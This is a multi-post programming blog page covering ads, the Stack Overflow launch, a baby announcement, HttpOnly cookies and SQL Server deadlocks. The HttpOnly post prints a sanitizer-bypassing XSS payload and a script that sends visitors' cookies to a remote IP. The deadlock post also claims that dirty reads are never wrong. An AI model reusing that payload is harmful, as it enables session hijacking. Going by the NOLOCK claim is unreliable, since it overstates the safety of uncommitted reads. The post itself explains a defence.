Coding Horror

programming and human factors

Bill Gates and Code Complete

By now I’m sure you’ve at least heard of, if not already seen, the new Windows Vista advertisements featuring Bill Gates and Jerry Seinfeld. They haven’t been well received, to put it mildly, but the latest commercial is actually not bad in its longer four-minute version:

On the whole, I’d call these ads opaque bordering on inane. Rumor has it the entire campaign has been cancelled. It wasn’t entirely unsuccessful, I suppose; the goal of advertising is to get people talking. Even if every one of those conversations starts with "what the hell were they thinking?", hey -- it’s a conversation. About an ad. The ad agencies have won.

I guess Microsoft figured it had to do something to counter the long-running "I’m a Mac, I’m a PC" ads from Apple. I secretly love these ads, because the hidden subtext is that if you use a PC, you’re as cool as John Hodgman:

My problem with these ads begins with the casting. As the Mac character, Justin Long (who was in the forgettable movie Dodgeball and the forgettabler TV show Ed) is just the sort of unshaven, hoodie-wearing, hands-in-pockets hipster we’ve always imagined when picturing a Mac enthusiast. He’s perfect. Too perfect. It’s like Apple is parodying its own image while also cementing it. If the idea was to reach out to new types of consumers (the kind who aren’t already evangelizing for Macs), they ought to have used a different type of actor.

Meanwhile, the PC is played by John Hodgman -- contributor to The Daily Show and This American Life, host of an amusing lecture series, and all-around dry-wit extraordinaire. Even as he plays the chump in these Apple spots, his humor and likability are evident. (Look at that hilariously perfect pratfall he pulls off in the spot titled "Viruses.") The ads pose a seemingly obvious question -- would you rather be the laid-back young dude or the portly old dweeb? -- but I found myself consistently giving the "wrong" answer: I’d much sooner associate myself with Hodgman than with Long.

The sleight of hand breaks down a bit when you realize that Hodgman actually uses Macs, but that’s advertising for you: a giant pack of lies. In other breaking news, water still wet, sky still blue.

The reason I bring this up is not to fan the eternal flame of platform wars, but to highlight one interesting little detail in the ad. At about 1:05, you’ll see Gates reading a bedtime story to the family’s son from some obscure technical tome or other. But not just any technical tome -- he’s reading from the book that this very blog is named after, my all-time favorite programming book, Steve McConnell’s Code Complete.

You can use [the table-driven method] approach in any object-oriented language. It’s less error-prone, more maintainable, and more efficient than lengthy if statements, case statements, or copious subclasses. The fact that a design uses inheritance and polymorphism doesn’t make it a good design. The rote object-oriented design described earlier in the "Object-Oriented Approach" section would require as much code as a rote functional design -- or more.

The above is excerpted from Chapter 18, "Table-Driven Methods," page 423. You might argue that I have an unhealthy fascination with Steve McConnell and Code Complete. You wouldn’t be wrong.

I’m probably preaching to the choir here, but I doubt it’s a coincidence that Gates chose that particular book; I’m sure it’s one of his all-time favorite books, too.

Hat tip to Matthew Eckstein for pointing this one out!

Discussion

Stack Overflow: None of Us is as Dumb as All of Us

I'm in no way trying to conflate this with the meaning of my last blog post, but after a six month gestation, we just gave birth to a public website.

Stack Overflow: none of us is as dumb as all of us

Of course, I'm making a sly little joke about community here, but I really believe in this stuff. Stack Overflow is, as much as I could make it, a collective effort of the programmer community.

Here's the original vision statement for Stack Overflow from back in April:

So what is stackoverflow?

From day one, my blog has been about putting helpful information out into the world. I never had any particular aspirations for this blog to become what it is today; I'm humbled and gratified by its amazing success. It has quite literally changed my life. Blogs are fantastic resources, but as much as I might encourage my fellow programmers to blog, not everyone has the time or inclination to start a blog. There's far too much great programming information trapped in forums, buried in online help, or hidden away in books that nobody buys any more. We'd like to unlock all that. Let's create something that makes it easy to participate, and put it online in a form that is trivially easy to find.

Are you familiar with the movie pitch formula?

Stackoverflow is sort of like the anti-experts-exchange (minus the nausea-inducing sleaze and quasi-legal search engine gaming) meets wikipedia meets programming reddit. It is by programmers, for programmers, with the ultimate intent of collectively increasing the sum total of good programming knowledge in the world. No matter what programming language you use, or what operating system you call home. Better programming is our goal.

Although reaction has generally been positive, there has been a bit of backlash. Some have promoted the idea that Stack Overflow will only contribute to the increasing dumbenation of the world's developers. I think this is, in a word, horsecrap. I liked Joel's response to this in podcast 21 (mp3):

And it is true that we are all, as developers, hopelessly incompetent. The goal of a site like Stack Overflow is to somehow share the correct knowledge wherever it may be as it is scattered throughout the universe, and to cause that to be voted up and to be spread amongst us. There's this big universe of dumb programmers, and I'm one of them, and we all have a little bit of knowledge. I may know how to do this thing in VB6 which may be useful to somebody one day who's trying to maintain some ridiculously old piece of crap code. We all have these little tiny pieces of information and if we can just contribute a little bit, that information gets amplified, and maybe a thousand other dumb developers will benefit from my one little piece of good information.

And here's my response, from the same podcast episode, to all those who turn up their noses at community sites like this, preferring the input of "experts":

The idea that you have all these experts waiting in the wings to do stuff is an illusion in my experience. There's really just a bunch of amateurs muddling along trying to do things together. The people that are truly experts are too busy to even help, right? And if the experts are too busy to help, what difference does it really make if there are experts at all? Because the whole point of this endeavor is helping other developers, and whether you're an expert or not, if you have no time to help, you're not really contributing to the solution.

Stack Overflow is by no means done. We're still technically in public beta. But I believe what we have -- the confluence of wiki, discussion, blog, and reddit/digg ranking systems -- is a fair representation of our original vision for Stack Overflow.

venn diagram: wiki - digg/reddit - blog - forum

It's a place where a busy programmer can invest a few minutes with as little friction as possible, and get something tangible from the community in return.

But who cares what I think; my opinion holds no particular weight. I'm just a member. This is our site. You tell me: how dumb are we?

Discussion

Spawning a New Process

I don't usually talk about my personal life here, but I have to make an exception in this case.

fetus, 13 weeks, 1 day

I debated for days which geeky reference I would use as a synonym for "we're having a baby". The title is the best I could do. I'm truly sorry.

As an aside, this is something my wife and I have worked at for a number of years, and it was only truly possible through the Miracle of Science™. Despite the best of intentions, you really start to resent all those teenage couples who manage to get pregnant so awkwardly and accidentally. Oh, that's right! You have sex! It's so obvious in retrospect!

Not that managing to procreate is anything special compared to programming. Just ask the inestimable Richard Stallman:

It doesn't take special talents to reproduce -- even plants can do it. On the other hand, contributing to a program like Emacs takes real skill. That is really something to be proud of.

It helps more people, too.

At any rate, I'm looking forward to stocking our unborn child's mind with all my insane, crazy ideas. I think Dave Eggers said it best in A Heartbreaking Work of Staggering Genius, describing a road trip he took with his younger brother after the death of his parents:

His brain is my laboratory, my depository. Into it I can stuff the books I choose, the television shows, the movies, my opinion about elected officials, historical events, neighbors, passersby. He is my twenty-four-hour classroom, my captive audience, forced to ingest everything I deem worthwhile. He is a lucky, lucky boy! And no one can stop me. He is mine, and you cannot stop me, cannot stop us. Try to stop us, you pu**y! You can't stop us from singing, and you can't stop us from making fart sounds, from putting our hands out the window to test the aerodynamics of different hand formations, from wiping the contents of our noses under the front of our seats.

We cannot be stopped from looking with pity upon all the world's sorry inhabitants, they unblessed by our charms, unchallenged by our trials, unscarred and thus weak, gelatinous. You cannot stop me from telling Toph to make comments about and faces at the people in the next lane.

It's unfair. The matchups, Us. v. Them (or you) are unfair. We are dangerous. We are daring and immortal. Fog whips up from under the cliffs and billows over the highway. Blue breaks from beyond the fog and sun suddenly screams from the blue.

I guess what I'm trying to say is that, with any luck, he or she will be scarred for life. That's a proud family tradition where I come from.

Discussion

Protecting Your Cookies: HttpOnly

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard-headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.

Most of the time when you accept input from the user, the very first thing you do is pass it through an HTML encoder. So tricksy things like:

<script>alert('hello XSS!');</script>

are automagically converted into their harmless encoded equivalents:

&lt;script&gt;alert('hello XSS!');&lt;/script&gt;
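The encoding step itself is trivial in any stack. Here's a minimal sketch using Python's standard library, purely for illustration (the site in question ran on ASP.NET, which has its own encoder):

```python
# Minimal HTML-encoding sketch: the characters that carry markup meaning
# (&, <, >) are replaced with entity equivalents, defusing injected tags.
import html

user_input = "<script>alert('hello XSS!');</script>"
encoded = html.escape(user_input, quote=False)
print(encoded)
# → &lt;script&gt;alert('hello XSS!');&lt;/script&gt;
```

The hard part, as the rest of this post shows, isn't the encoding; it's deciding when you can't apply it wholesale.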

In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!

As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.

If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.

When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:

  1. A modern web browser
  2. A browser that actually implements HttpOnly correctly
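Setting the flag is usually a one-liner in whatever framework you use. As a sketch only, here's the shape of it with Python's standard library (the cookie name mirrors the ASP.NET session cookie; this is not how an ASP.NET app would actually set it):

```python
# Sketch of emitting an HttpOnly cookie header. Any framework that lets
# you set cookie attributes can produce the same header; the flag itself
# is just extra text appended to the Set-Cookie line.
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["ASP.NET_SessionId"] = "ig2fac55"
cookie["ASP.NET_SessionId"]["path"] = "/"
cookie["ASP.NET_SessionId"]["httponly"] = True

print(cookie.output())
# prints a Set-Cookie line that includes the HttpOnly attribute
```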

The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a browser which isn't exactly known for its iron-clad security record.

Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838

This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre-YouTube.

HttpOnly cookies can in fact be remarkably effective. Here's what we know:

  • HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
  • HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
  • XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.

The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.

Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!

HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.

Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.

(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)

Discussion

Deadlocked!

You may have noticed that my posting frequency has declined over the last three weeks. That's because I've been busy building that Stack Overflow thing we talked about.

It's going well so far. Joel Spolsky also seems to think it's going well, but he's one of the founders so he's clearly biased. For what it's worth, Robert Scoble was enthused about Stack Overflow, though it did not make him cry. Still, I was humbled by the way Robert picked this up so enthusiastically through the community. I hadn't contacted him in any way; I myself only found out about his reaction third hand.

That's not to say everything has been copacetic. One major surprise in the development of Stack Overflow was this recurring and unpredictable gem:

Transaction (Process ID 54) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.

Deadlocks are a classic computer science problem, often taught to computer science students as the Dining Philosophers puzzle.

dining-philosophers-problem-comic.

Five philosophers sit around a circular table. In front of each philosopher is a large plate of rice. The philosophers alternate their time between eating and thinking. There is one chopstick between each philosopher, to their immediate right and left. In order to eat, a given philosopher needs to use both chopsticks. How can you ensure all the philosophers can eat reliably without starving to death?

Point being, you have two processes that both need access to scarce resources that the other controls, so some sort of locking is in order. Do it wrong, and you have a deadlock -- everyone starves to death. There are lots of scarce resources in a PC or server, but this deadlock is coming from our database, SQL Server 2005.
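The classic fix for the philosophers is to impose a global ordering on lock acquisition, which makes the circular wait impossible. Here's a runnable thread-based sketch of that idea (purely illustrative; SQL Server's lock manager is vastly more elaborate than two chopsticks):

```python
# Dining philosophers with the lock-ordering fix: every philosopher
# acquires the lower-numbered chopstick first, so no cycle of waiters
# can ever form, and therefore no deadlock.
import threading

N = 5
chopsticks = [threading.Lock() for _ in range(N)]
meals = [0] * N

def philosopher(i, rounds=10):
    left, right = i, (i + 1) % N
    # Global ordering: always grab the lower-numbered lock first.
    first, second = (left, right) if left < right else (right, left)
    for _ in range(rounds):
        with chopsticks[first]:
            with chopsticks[second]:
                meals[i] += 1  # eat

threads = [threading.Thread(target=philosopher, args=(i,)) for i in range(N)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(meals)  # → [10, 10, 10, 10, 10]
```

If instead every philosopher grabbed their left chopstick first, all five could pick up one chopstick simultaneously and starve waiting for the other -- the textbook deadlock.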

You can attach the profiler to catch the deadlock event and see the actual commands that are deadlocking. I did that, and found there was always one particular SQL command involved:

UPDATE [Posts]
SET [AnswerCount] = @p1, [LastActivityDate] = @p2, [LastActivityUserId] = @p3
WHERE [Id] = @p0

If it detects a deadlock, SQL Server forces one of the deadlocked commands to lose -- specifically, the one that is cheapest to roll back. The statement on the losing side varied, but in our case the losing statement was always a really innocuous database read, like so:

SELECT *
FROM [Posts]
WHERE [ParentId] = @p0

(Disclaimer: the above SQL is simplified for the purposes of this post.) This deadlock perplexed me on a few levels.

  1. How can a read be blocked by a write? What possible contention could there be from merely reading the data? It's as if one of the dining philosophers happened to glance over at another philosopher's plate, and the other philosopher, seeing this, screamed "meal viewing deadlock!" and quickly covered his plate with his hands. Yes, it's ridiculous. I don't want to eat your food -- I just want to look at it.

  2. We aren't doing that many writes. Like most web apps, we're insanely read-heavy. The particular SQL statement you see above only occurs when someone answers a question. As much as I want to believe Stack Overflow will be this massive, rip-roaring success, there just cannot be that many answers flowing through the system in beta. We went through our code with a fine tooth comb, and yep, we're barely writing anywhere except when users ask a question, edit something, or answer a question.

  3. What about retries? I find it hard to believe that little write would take so incredibly long that a read would have to wait more than a few milliseconds at most.
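On the retry point: the error message's own advice -- rerun the transaction -- is a legitimate mitigation while you hunt for the root cause, since the victim's work is rolled back cleanly. A hedged sketch of the pattern, where `DeadlockError` and the transaction callable are hypothetical stand-ins for whatever your data layer actually raises (for SQL Server, the driver exception carrying error 1205):

```python
# Generic retry-on-deadlock wrapper with brief exponential backoff.
# DeadlockError is a stand-in; a real data layer would catch its
# driver's specific deadlock-victim exception instead.
import time

class DeadlockError(Exception):
    """Stand-in for a 'chosen as the deadlock victim' error."""

def run_with_retry(transaction, attempts=3, backoff=0.05):
    for attempt in range(attempts):
        try:
            return transaction()
        except DeadlockError:
            if attempt == attempts - 1:
                raise  # out of retries; surface the error
            time.sleep(backoff * (2 ** attempt))

# Usage: a transaction that is picked as the victim once, then succeeds.
calls = {"n": 0}
def flaky_update():
    calls["n"] += 1
    if calls["n"] == 1:
        raise DeadlockError("Rerun the transaction.")
    return "ok"

result = run_with_retry(flaky_update)
print(result)  # → ok
```

Retries paper over the symptom, of course; they don't explain why a trivial read was losing to a trivial write in the first place.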

If you aren't eating -- modifying data -- then how can trivial super-fast reads be blocked on rare writes? We've had good results with SQL Server so far, but I found this behavior terribly disappointing. Although these deadlocks were somewhat rare, they still occurred a few times a day, and I'm deeply uncomfortable with errors I don't fully understand. This is the kind of stuff that quite literally keeps me up at night.

I'll freely admit this could be due to some peculiarities in our code (translated: we suck), and reading through some sample SQL traces of subtle deadlock conditions, it's certainly possible. We racked our brains and our code, and couldn't come up with any obvious boneheaded mistakes. While our database is somewhat denormalized, all of our write conditions are relatively rare and hand-optimized to be small and fast. In all honesty, our app is just not all that complex. It ain't rocket surgery.

If you ever have to troubleshoot database deadlocks, you'll inevitably discover the NOLOCK statement. It works like this:

SELECT *
FROM [Posts] with (nolock)
WHERE [ParentId] = @p0

The NOLOCK hint itself is SQL Server syntax, though some other databases offer an equivalent read uncommitted isolation setting. It runs the query at the read uncommitted transaction isolation level, also known as "dirty reads" -- the lowest possible level of locking.

But is nolock dangerous? Could you end up reading invalid data with read uncommitted on? Yes, in theory. You'll find no shortage of database architecture astronauts who start dropping ACID science on you and all but pull the building fire alarm when you tell them you want to try nolock. It's true: the theory is scary. But here's what I think:

In theory there is no difference between theory and practice. In practice there is.

I would never recommend using nolock as a general "good for what ails you" snake oil fix for any database deadlocking problems you may have. You should try to diagnose the source of the problem first.

But in practice adding nolock to queries that you absolutely know are simple, straightforward read-only affairs never seems to lead to problems. I asked around, and I got advice from a number of people whose opinions and experience I greatly trust and they, to a (wo)man, all told me the same thing: they've never seen any adverse reaction when using nolock. As long as you know what you're doing. One related a story of working with a DBA who told him to add nolock to every query he wrote!

With nolock / read uncommitted / dirty reads, data may be out of date at the time you read it, but it's never wrong or garbled or corrupted in a way that will crash your application. And honestly, most of the time, who cares? If your user profile page is a few seconds out of date, how could that possibly matter?

Adding nolock to every single one of our queries wasn't really an option. We added it to all the ones that seemed safe, but our use of LINQ to SQL made it difficult to apply the hint selectively.

I'm no DBA, but it seems to me the root of our problem is that the default SQL Server locking strategy is incredibly pessimistic out of the box:

The database philosophically expects there will be many data conflicts: multiple sessions all trying to change the same data at the same time, with corruption as the result. To avoid this, locks are put in place to guard data integrity ... there are a few instances, though, when this pessimistic heavy-lock design is more of a negative than a positive, such as applications that have very heavy read activity with light writes.

Wow, very heavy read activity with light writes. What does that remind me of? Hmm. Oh yes, that damn website we're building. Fortunately, there is a mode in SQL Server 2005 designed for exactly this scenario: read committed snapshot:

Snapshots rely on an entirely new data change tracking method ... more than just a slight logical change, it requires the server to handle the data physically differently. Once this new data change tracking method is enabled, it creates a copy, or snapshot of every data change. By reading these snapshots rather than live data at times of contention, Shared Locks are no longer needed on reads, and overall database performance may increase.
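Enabling it is a one-time setting per database. The standard T-SQL looks like this (the database name is a placeholder, and the command needs momentary exclusive access to the database to take effect):

```sql
-- [YourDatabase] is a placeholder name
ALTER DATABASE [YourDatabase]
SET READ_COMMITTED_SNAPSHOT ON;
```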

I'm a little disappointed that SQL Server treats our silly little web app like it's a banking application. I think it's incredibly telling that a Google search for SQL Server deadlocks returns nearly twice the results of a query for MySQL deadlocks. I'm guessing that MySQL, which grew up on web apps, is much less pessimistic out of the box than SQL Server.

I find that deadlocks are difficult to understand and even more difficult to troubleshoot. Fortunately, it's easy enough to fix by setting read committed snapshot on the database for our particular workload. But I can't help thinking our particular database vendor just isn't as optimistic as they perhaps should be.

Discussion